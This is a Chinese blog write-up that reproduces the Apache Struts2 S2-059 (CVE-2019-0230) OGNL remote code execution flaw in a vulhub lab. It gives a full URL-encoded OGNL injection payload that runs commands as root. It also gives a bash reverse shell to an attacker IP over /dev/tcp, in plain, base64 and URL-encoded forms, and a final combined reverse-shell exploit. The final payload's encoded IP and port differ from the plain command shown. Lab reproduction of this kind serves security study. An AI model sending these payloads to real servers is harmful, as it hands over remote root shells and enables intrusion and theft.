CVE-2019-0230 S2-059 远程代码执行漏洞

原创

用户8478947

发布于 2022-12-07 14:31:00

4320

发布于 2022-12-07 14:31:00

1 漏洞信息

漏洞名称	远程代码执行漏洞
漏洞编号	CVE-2019-0230
危害等级	高危
CVSS评分	8.5
漏洞类型	中间件漏洞
漏洞厂商	Apache
漏洞组件	Struts2
受影响版本	2.0.0 <= Struts2 <= 2.5.20
漏洞概述	Apache Struts2使用某些标签时,会对标签属性值进行二次表达式解析,当标签属性值使用了%{xxx}并且xxx的值用户可以控制,就会造成OGNL表达式执行。OGNL是一个功能强大的表达式语言，用来获取和设置 java 对象的属性。

2 环境搭建

2.1 环境概述

Linux操作系统

2.2 搭建过程

拉取镜像

 cd vulhub/struts2/s2-059
 docker-compose up -d

访问

3 漏洞复现

工具vulhub官网的poc，输入id参数查看是否存在该漏洞。发现成功执行了333*3的语句，说明存在该漏洞。

访问漏洞url并且添加恶意payload进行抓包。

 id=%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request['struts.valueStack'].context).(%23cr%3d%23ct['com.opensymphony.xwork2.ActionContext.container']).(%23ou%3d%23cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ou.setExcludedPackageNames('')).(%23ou.setExcludedClasses('')).(%23ct.setMemberAccess(%23dm)).(%23a%3d@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(%23a.getInputStream()))%7d

发现成功执行了id命令，发现是root权限。

修改payload，执行反弹shell命令。

首先要监听端口，ip是攻击ip，不是漏洞靶机ip。

对要生成的反弹shell命令进行base编码，然后还要进行url编码

 这里的ip地址也是攻击机的ip地址
 bash -i >& /dev/tcp/192.168.146.146/9999 0>&1
 
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNDYvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 
 bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNDYvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

最终的反弹shell payload如下

 id=%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request['struts.valueStack'].context).(%23cr%3d%23ct['com.opensymphony.xwork2.ActionContext.container']).(%23ou%3d%23cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ou.setExcludedPackageNames('')).(%23ou.setExcludedClasses('')).(%23ct.setMemberAccess(%23dm)).(%23a%3d@java.lang.Runtime@getRuntime().exec('bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk2NyAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D')).(@org.apache.commons.io.IOUtils@toString(%23a.getInputStream()))%7d

反弹成功